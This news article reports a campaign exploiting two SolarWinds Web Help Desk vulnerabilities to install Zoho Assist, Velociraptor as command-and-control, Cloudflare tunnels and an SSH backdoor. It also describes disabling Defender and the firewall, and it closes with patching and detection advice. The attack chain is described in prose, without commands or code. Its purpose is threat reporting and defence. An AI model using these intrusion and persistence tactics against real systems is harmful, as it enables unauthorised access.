Hackers Use SolarWinds Flaws to Deploy DFIR Tool in Attacks

Cybersecurity researchers have uncovered a sophisticated attack campaign where malicious actors are actively exploiting critical vulnerabilities in SolarWinds Web Help Desk software. This activity allows them to deploy legitimate remote management and incident response tools for harmful purposes, establishing persistent access and command-and-control infrastructure within targeted networks. The campaign underscores the growing trend of attackers weaponizing trusted software to evade detection and carry out intrusions.

The malicious activity was first identified by analysts at Huntress Security, who believe the campaign began in mid-January. The attackers specifically leverage two critical-severity vulnerabilities, CVE-2025-40551 and CVE-2025-26399, which enable remote code execution without requiring any authentication. These flaws were recently disclosed and have already been flagged by the Cybersecurity and Infrastructure Security Agency (CISA) as being actively exploited. Following initial access, the threat actors rapidly deploy a suite of tools to maintain their foothold.

The attack chain begins with the installation of the Zoho ManageEngine Assist remote access agent. The attackers fetch the installer from a public file-hosting service, configure it for unattended access, and register the compromised machine to an account linked to an anonymous email service. This tool provides them with direct, hands-on-keyboard control and is used for initial reconnaissance within the network environment.

A key component of the intrusion is the deployment of Velociraptor, a powerful digital forensics and incident response platform that is being repurposed as a command-and-control framework. In these attacks, the tool communicates with the attackers’ servers through Cloudflare Workers. Notably, the hackers used an outdated version of Velociraptor that contains a known privilege escalation vulnerability, allowing them to increase their permissions on the host system.

For redundancy and persistence, the attackers also establish Cloudflare tunnels using the official Cloudflared utility. This creates a secondary, tunnel-based access channel to ensure they maintain communication with the compromised host even if primary methods are blocked. In some instances, they created a scheduled task to open a Secure Shell backdoor, providing yet another avenue for access.

To operate without hindrance, the threat actors took deliberate steps to disable security software. They modified the Windows registry to turn off Windows Defender and the Windows Firewall. Shortly after disabling these protections, they downloaded a fresh copy of the Visual Studio Code binary, potentially to use its tunneling capabilities or for other post-exploitation activities.

While Microsoft researchers have also observed multi-stage intrusions targeting internet-exposed SolarWinds WHD instances, neither they nor Huntress have attributed these attacks to a known threat group. Microsoft described the compromised environments as “high-value assets,” but no specific information about the victim organizations has been released.

To defend against these exploits, system administrators are urged to take immediate action. Applying security updates to upgrade SolarWinds Web Help Desk to version 2026.1 or later is the most critical step. It is also highly recommended to remove public internet access to the WHD administrative interfaces and to reset all credentials associated with the product. Huntress has shared detection rules and indicators of compromise to help security teams identify activity related to Zoho Assist, Velociraptor, Cloudflared, and suspicious MSI installations or PowerShell executions.

(Source: Bleeping Computer)